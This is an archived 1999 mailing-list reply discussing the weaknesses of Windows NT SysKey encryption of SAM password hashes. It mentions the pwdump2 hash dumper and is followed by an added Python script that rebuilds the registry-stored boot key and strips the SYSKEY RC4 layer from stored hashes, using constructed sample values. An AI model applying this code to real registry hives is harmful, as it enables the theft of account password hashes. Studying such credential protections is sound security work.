Exploit-Dev Archives: Re: NT SysKey should be breakable


Todd Sabin (tsabin@BOS.BINDVIEW.COM)
Sat, 9 Oct 1999 11:33:53 -0400


Mikael Olsson <mikael.olsson@ENTERNET.SE> writes:

> Has anyone looked closely on the WinNT SysKey application?
>

A little.

> Supposedly, it encrypts your SAM files (the ones in
> \winnt\repair too?) so that Evil People(tm) can't
> just leech them off your machine and hand them to
> L0phtCrack.
>
> Something is telling me that this only buys you so much
> protection, since the SAM secret would need to be known
> to the OS. THAT in turn means that userland apps
> (at least ones running as LocalSystem) should be able to
> find that same secret.
>

If the machine is running and you have admin, finding the SYSKEY is
unnecessary. You can use my pwdump2 program
(http://www.webspan.net/~tas/pwdump2) to dump the unencrypted hashes
directly.

> I _know_ this is not a one-way thing, since SysKey actually
> asks you where to store the secret (password protected,
> on a floppy, or just plain).
>
> - Plain stored secret should be "easy" to find.
>
> - If someone enables password protection, it should still
> be possible to break the secret of the SAM secret using
> known plaintext attacks. We know that the original SAM._
> file begins with "MSCF" followed by four zero bytes.
> That's eight bytes of known plaintext.
> There's also a string "$$hive$$.tmp" later on that seems
> to be constant, which we should be able to use as known
> plaintext. (These are just the obvious ones)
>

SYSKEY doesn't encrypt the entire contents of the SAM file, only the
'sensitive' parts: the password hashes and password histories, I
think. More recent service packs have extended it to also encrypt the
LSA secrets and cached logon passwords, I believe.

> I'm going to go ahead and guess that the secret
> used to encrypt the SAM secret is an LMHASH of
> the given password.
>
> It could also be that the SAM secret is kept
> somewhere in RAM without the password scramble.
>

I think this is the case, but am not sure. I know it's originally
obtained by winlogon during the boot process, and then handed off to
lsass, which uses it to do the on-the-fly decryption. Also, I didn't
see anything that would prevent the SYSKEY from ending up in the swap
file, so it may be possible to grab it from there.

> - Floppy secrets could also be breakable; again, maybe
> they are loaded into RAM, or maybe the Admin just
> happened to leave the floppy in the drive :-P
>
>
> Maybe worth looking into?

I think the things most worth looking at are what you can do if you,
e.g., steal a machine or backup tape but don't get the SYSKEY. These
are the types of attacks it's meant to protect against.

Todd
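The reply above says SYSKEY only wraps the hash fields of the SAM, that the
key is assembled at boot and then used by lsass to decrypt on the fly, and
that the "plain" storage mode keeps the secret on the machine. The following
is an added example, not code from this post or from pwdump2: it reconstructs
the registry-stored ("plain") SYSKEY mode as it was later documented by
open-source tools such as samdump2 and impacket's secretsdump. It assembles
the boot key from the class names of the four Lsa subkeys (JD, Skew1, GBG,
Data), derives the hashed boot key from the domain F record, verifies its
checksum, and strips the per-user RC4 layer from a stored hash. What is left
after that layer is the pre-SYSKEY storage format (the hash still DES-encrypted
with RID-derived keys), which is not implemented here. The password and
floppy modes replace only the boot-key assembly step and are also not shown.
All class names, salt, SAM key, RID and hash bytes below are constructed sample
values, not data from any real system.

```python
"""Registry-stored SYSKEY layer of the NT SAM, as documented by samdump2 /
impacket. Added example; every sample value below is constructed."""
import hashlib
import struct

# Constants baked into the SAM encryption (public, from samdump2/impacket).
QWERTY = b"!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%\0"
DIGITS = b"0123456789012345678901234567890123456789\0"
NTPASSWORD = b"NTPASSWORD\0"
LMPASSWORD = b"LMPASSWORD\0"
# Byte permutation applied to the 16 bytes read from the Lsa subkey class names.
BOOTKEY_PERMUTATION = [8, 5, 4, 2, 11, 9, 13, 3, 0, 6, 1, 12, 14, 10, 15, 7]

# Constructed sample registry data (not from a real machine).
SAMPLE_CLASS_NAMES = ("0123abcd", "4567ef01", "89ab2345", "cdef6789")  # JD, Skew1, GBG, Data
SAMPLE_SALT = bytes(range(16))
SAMPLE_SAM_KEY = bytes.fromhex("00112233445566778899aabbccddeeff")
SAMPLE_RID = 500
SAMPLE_OBFUSCATED_NT = bytes.fromhex("fedcba9876543210fedcba9876543210")  # RID-DES layer, constructed


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). RC4 is its own inverse, so this encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def bootkey_from_class_names(jd: str, skew1: str, gbg: str, data: str) -> bytes:
    """Assemble the SYSKEY from the class names of HKLM\\SYSTEM\\...\\Control\\Lsa\\{JD,Skew1,GBG,Data}.
    Each class name is 8 hex characters; together they give 16 bytes, which are then permuted."""
    raw = bytes.fromhex(jd + skew1 + gbg + data)
    return bytes(raw[p] for p in BOOTKEY_PERMUTATION)


def hashed_bootkey(f_record: bytes, bootkey: bytes) -> bytes:
    """Derive the 32-byte hashed boot key from the SAM\\Domains\\Account F value.
    f_record[0x70:0x80] is a salt; f_record[0x80:0xA0] is RC4(MD5(salt|QWERTY|bootkey|DIGITS), key|checksum).
    The trailing 16 bytes are a checksum, so a wrong SYSKEY is detected here instead of yielding garbage."""
    salt = f_record[0x70:0x80]
    rc4_key = hashlib.md5(salt + QWERTY + bootkey + DIGITS).digest()
    hbk = rc4(rc4_key, f_record[0x80:0xA0])
    expected = hashlib.md5(hbk[:16] + DIGITS + hbk[:16] + QWERTY).digest()
    if hbk[16:] != expected:
        raise ValueError("SYSKEY checksum mismatch: wrong boot key")
    return hbk


def remove_syskey_layer(hbk: bytes, rid: int, enc_hash: bytes, is_nt: bool = True) -> bytes:
    """Strip the SYSKEY (RC4) layer from one stored 16-byte hash. What remains is the
    pre-SYSKEY format: the hash DES-encrypted under RID-derived keys (not handled here).
    Because RC4 is symmetric, the same call also applies the layer to a pre-SYSKEY hash."""
    tag = NTPASSWORD if is_nt else LMPASSWORD
    rc4_key = hashlib.md5(hbk[:16] + struct.pack("<L", rid) + tag).digest()
    return rc4(rc4_key, enc_hash)


def make_f_record(sam_key: bytes, salt: bytes, bootkey: bytes) -> bytes:
    """Build a constructed F value carrying sam_key under bootkey (inverse of hashed_bootkey).
    Only offsets 0x70..0xA0 matter for the key; the rest of the record is zero-filled here."""
    checksum = hashlib.md5(sam_key + DIGITS + sam_key + QWERTY).digest()
    rc4_key = hashlib.md5(salt + QWERTY + bootkey + DIGITS).digest()
    return b"\x00" * 0x70 + salt + rc4(rc4_key, sam_key + checksum)


def demo():
    """Round trip on the constructed sample: returns (hashed boot key, stored hash, recovered hash)."""
    bootkey = bootkey_from_class_names(*SAMPLE_CLASS_NAMES)
    f_record = make_f_record(SAMPLE_SAM_KEY, SAMPLE_SALT, bootkey)
    hbk = hashed_bootkey(f_record, bootkey)
    stored = remove_syskey_layer(hbk, SAMPLE_RID, SAMPLE_OBFUSCATED_NT)   # what the V record would hold
    recovered = remove_syskey_layer(hbk, SAMPLE_RID, stored)              # what lsass recovers at runtime
    return hbk, stored, recovered


if __name__ == "__main__":
    hbk, stored, recovered = demo()
    print("hashed boot key:", hbk[:16].hex())
    print("stored (SYSKEY'd) hash:", stored.hex())
    print("after removing SYSKEY layer:", recovered.hex())
```

Note that everything the script needs is readable from the registry on a
running box with admin rights, which is the point made above about pwdump2:
the boot key only buys protection when the attacker has the hive files but
not the SYSTEM hive (or floppy, or password) that carries the key.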



This archive was generated by hypermail 2.0b3 on Sat Oct 09 1999 - 11:05:45 CDT